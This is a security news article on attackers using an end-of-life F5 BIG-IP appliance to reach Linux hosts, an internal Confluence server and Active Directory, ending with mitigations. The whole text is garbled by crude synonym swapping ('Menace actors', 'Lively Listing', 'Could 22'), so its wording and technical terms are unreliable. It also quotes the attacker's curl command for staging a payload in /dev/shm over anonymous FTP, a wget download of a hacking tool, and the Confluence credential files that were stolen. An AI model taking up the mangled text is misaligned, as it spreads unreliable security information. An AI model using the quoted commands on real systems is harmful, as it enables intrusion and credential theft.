Hackers Exploit F5 BIG-IP to Acquire SSH Entry and Pivot Into Linux Networks

Menace actors are actively exploiting end-of-life F5 BIG-IP home equipment to achieve unauthorized SSH entry into enterprise networks, utilizing the compromised units as launchpads for classy multi-stage intrusion campaigns that finally goal Lively Listing infrastructure.

Microsoft Menace Intelligence disclosed the complete assault chain on Could 22, 2026, documenting how a single compromised edge equipment cascaded into domain-level compromise spanning Linux hosts, an inner Atlassian Confluence server, and Home windows authentication methods.

Within the documented incident, investigators traced the menace actor’s preliminary SSH entry to an Azure-hosted F5 BIG-IP Digital Version (VE) working model 15.1.201000, a cloud-deployed construct generally provisioned through Azure ARM templates and Terraform modules.

This particular model reached end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported on the time of compromise.

F5 BIG-IP to Acquire SSH Entry

The timing aligns immediately with the broader F5 menace panorama. In August 2025, a complicated nation-state menace actor breached F5’s inner methods and exfiltrated BIG-IP product supply code together with particulars of undisclosed, unpatched vulnerabilities.

That breach, publicly disclosed by F5 in October 2025, has been linked to the BRICKSTORM malware household, which is related to campaigns concentrating on software program and cloud distributors to reap supply code and credentials for downstream provide chain exploitation.

Compounding the chance, CVE-2025-53521, a important flaw in F5 BIG-IP Entry Coverage Supervisor (APM), was initially disclosed in October 2025 as a denial-of-service bug. Nonetheless, it was reclassified in March 2026 as a distant code execution (RCE) vulnerability with a CVSS rating of 9.8.

CISA added CVE-2025-53521 to its Identified Exploited Vulnerabilities (KEV) catalog on March 27, 2026, with Shadowserver Basis reporting over 17,000 susceptible IPs worldwide on the time. The Dutch Nationwide Cyber Safety Heart additionally independently confirmed lively abuse of this vulnerability within the wild.

As soon as SSH entry was established through the compromised F5 equipment, the menace actor authenticated utilizing a privileged account with unrestricted sudo rights and maintained hands-on keyboard entry all through your entire intrusion with out deploying specific persistence mechanisms.

The attacker instantly launched aggressive reconnaissance utilizing a layered toolkit:

• Nmap with automated shell scripts for horizontal and vertical community scanning throughout inner subnets
• GoWitness to screenshot-capture all found HTTP/HTTPS companies
• testssl to probe SSL/TLS weaknesses and establish potential protocol downgrade paths
• A customized ELF binary detected as HackTool:Linux/MalPack.B downloaded from 206.189.27[.]39:8888 through wget to enumerate net utility entry controls

Makes an attempt to make use of commonplace NTLM-based lateral motion instruments, together with enum4linux, kerbrute, responder, smbclient, and netexec  in opposition to the Home windows infrastructure have been initially unsuccessful.

Throughout reconnaissance, the menace actor recognized an internally hosted Atlassian Confluence server carrying unpatched distant code execution vulnerabilities.

Microsoft acknowledged that the server was not internet-facing; it turned reachable solely after the attacker gained inner community entry, a key threat in hybrid and cloud environments the place implicit belief boundaries exist between companies.

When real-time safety (RTP) on the Confluence host blocked direct payload supply, the menace actor tailored by standing up a Python FTP server on the preliminary Linux host to stage and switch the payload utilizing nameless FTP:

bashcurl -o /dev/shm/ag ftp://nameless:nameless@[REDACTED_LOCAL_IP]/5

After compromising Confluence, the attacker extracted credentials from /choose/atlassian/confluence/conf/server.xml and confluence.cfg.xml and weaponized them for Kerberos relay assaults in opposition to the area infrastructure.

This included exploitation of CVE-2025-33073, a Home windows SMB NTLM reflection vulnerability disclosed in June 2025 by researchers at RedTeam Pentesting and Synacktiv.

CVE-2025-33073 removes the prerequisite of admin entry to realize authenticated RCE as SYSTEM on any domain-joined machine with out SMB signing enforced, requiring solely community entry and any legitimate area credential.

Word: IP addresses and domains are deliberately defanged (e.g., [.]) to stop unintended decision or hyperlinking. Re-fang solely inside managed menace intelligence platforms resembling MISP, VirusTotal, or your SIEM.

Mitigation

• Retire EOL home equipment instantly deal with internet-facing edge units as Tier-0 belongings with strict lifecycle governance
• Patch inner purposes like Confluence with the identical urgency as internet-exposed companies.
• Disable or decrease NTLM, implement SMB signing, and allow LDAP signing and channel binding to dam relay assaults
• Allow Microsoft Defender for Endpoint in block mode constantly throughout all Linux servers.
• Implement a tiered administration mannequin to stop single-application credential theft from reaching area controllers

Comply with us on Google Information, LinkedIn, and X to Get Prompt Updates and Set GBH as a Most well-liked Supply in Google.